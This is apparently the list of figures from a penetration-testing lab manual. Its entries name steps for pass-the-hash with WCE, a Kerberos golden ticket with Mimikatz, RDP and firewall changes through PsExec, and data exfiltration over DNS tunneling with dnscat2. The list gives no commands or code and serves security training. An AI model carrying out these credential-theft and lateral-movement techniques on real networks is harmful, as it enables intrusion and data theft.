WMI: WMI Activity Trace Recorded WMIC Activity .......................................................... 83
Port Forwarding: FTP Denied Access Based on Source IP ................................................. 84
Port Forwarding: Successfully Logged in to FTP Server ................................................85
Remote RDP: Connection Failed ........................................................................................ 86
Remote RDP: Manipulating Registry Keys and AdvFirewall Settings With PsExec ........... 86
Remote RDP: Identity Warning .......................................................................................... 87
Pass-The-Hash: Copy LM & NTLM Hash............................................................................. 89
Pass-The-Hash: Wce -W Displays Account Details in Cleartext ......................................... 89
Pass-The-Hash: Wce -S Successfully Changed NTLM Credentials ..................................... 90
Pass-The-Hash: Access Granted By Replacing NTLM Credentials ..................................... 90
Pass-The-Hash: Process Owner Proves Pass-The-Hash Was Successful ........................... 91
Pass-The-Hash: Local Logon Sessions And NTLM Credentials .......................................... 91
Pass-The-Hash: Remote Desktop Manager ...................................................................... 91
Pass-The-Hash: Set up Remote Connection ...................................................................... 92
Pass-The-Hash: Initiating RDP Connection ........................................................................ 92
Pass-The-Hash: Administrator Session Listed.............................................................. 92
Kerberos Golden Ticket Attack: Pushd Command ............................................................. 94
Kerberos Golden Ticket Attack: SID of KRBTGT Service Account .................................94
Kerberos Golden Ticket Attack: Mimikatz ......................................................................... 95
Kerberos Golden Ticket Attack: Mimikatz Submitted Golden Ticket ................................ 95
Kerberos Golden Ticket Attack: Pushd Command Successful ......................................96
Kerberos Golden Ticket Attack: Successfully Infiltrated The Server ............................ 97

Final Challenge
Final Challenge: Environment ................................................................................................. 101

Appendix: Optional Activities


DNS Tunneling: Start dnscat2 Server ................................................................................ 107
DNS Tunneling: Start dnscat2 Client ..................................................................................108
DNS Tunneling: New Window ............................................................................................108


DNS Tunneling: Window Overview ....................................................................................108


DNS Tunneling: Successful Download, Server Console .................................................... 109
DNS Tunneling: Successful Download, Client Console ..................................................... 109
DNS Tunneling: Finance.txt Contents ............................................................................... 109
DNS Tunneling: New Window Marked with [*] ...................................................................... 110
DNS Tunneling: Shell Commands on Remote Machine .......................................................... 110
DNS Tunneling: Wireshark Proves DNS Protocol Usage .................................................. 110

Appendix: Commands & Parameters

